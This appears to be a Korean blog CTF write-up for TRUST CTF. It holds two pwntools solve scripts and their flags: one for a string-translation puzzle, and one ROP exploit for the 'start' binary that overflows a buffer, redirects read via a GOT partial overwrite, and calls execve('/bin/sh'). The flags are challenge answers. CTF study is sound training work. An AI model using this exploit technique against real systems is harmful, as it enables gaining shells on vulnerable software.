티스토리 뷰
Easy Taebo
from pwn import *
c = remote('server.trustctf.com', 44923)
for i in range(1, 101):
tmp = ""
str = []
c.recvuntil("Taebo %s : " %i)
str = c.recvline().replace("left_jab", "@==(^0^)@", 5).replace("left_mid_jab", "@=(^0^)@", 5).replace("right_mid_jab", "@(^0^)=@", 5).replace("mid_jab", "@(^0^)@", 5).replace("right_jab", "@(^0^)==@", 5).replace("left_hook", "@(^0^)@==", 5).replace("right_hook", "==@(^0^)@", 5).replace("left_speedball", "@@@(^0^)", 5).replace("right_speedball", "(^0^)@@@", 5).replace("left_kick", "@||(^0^)==@", 5).replace("mid_kick", "@==(^||^)==@", 5).replace("right_kick", "@==(^0^)||@", 5).replace(" >> \n", "", 1).split(' + ')
print("level%s" %i)
print(str)
j = len(str)
print(j)
for p in range(j):
tmp = tmp + str[p] + ' '
c.send(tmp + '\n')
c.interactive()
TRUST{w0w_y0u_9o7_4_w0nd3rfu1_b0dy_lik3_m3}
start
from pwn import *
#r = remote('server.trustctf.com', 10392)
r = process('./start')
e = ELF('./start')
pr = 0x4005ed # pop rsi
ppppr = 0x4005ea # pop rax,rdx,rdi,rsi
cmd = "/bin/sh\x00"
syscall = "\x7b"
payload = ""
payload += "A"*24
payload += p64(pr)
payload += p64(e.bss())
payload += p64(e.plt['read'])
payload += p64(pr)
payload += p64(e.got['read'])
payload += p64(e.plt['read'])
payload += p64(ppppr)
payload += p64(59)
payload += p64(0)
payload += p64(e.bss())
payload += p64(0)
payload += p64(e.plt['read'])
payload += cmd
r.sendline(payload)
r.send(syscall)
r.interactive()
TRUST{7h3_e4sie5t_t4sk_in_TRUST_CTF}
'Write-up' 카테고리의 다른 글
| [picoCTF] Buffer Overflow 1 (0) | 2019.06.19 |
|---|---|
| DEFCON 27 Quals Write-UP (0) | 2019.05.15 |
| Hackingcamp CTF 19th (0) | 2019.02.19 |
| CODEGATE 2019 Perliminary (0) | 2019.02.17 |
| KERIS 제 4회 정보보안경진대회 (0) | 2018.11.05 |
댓글
최근에 올라온 글
- Total
- Today
- Yesterday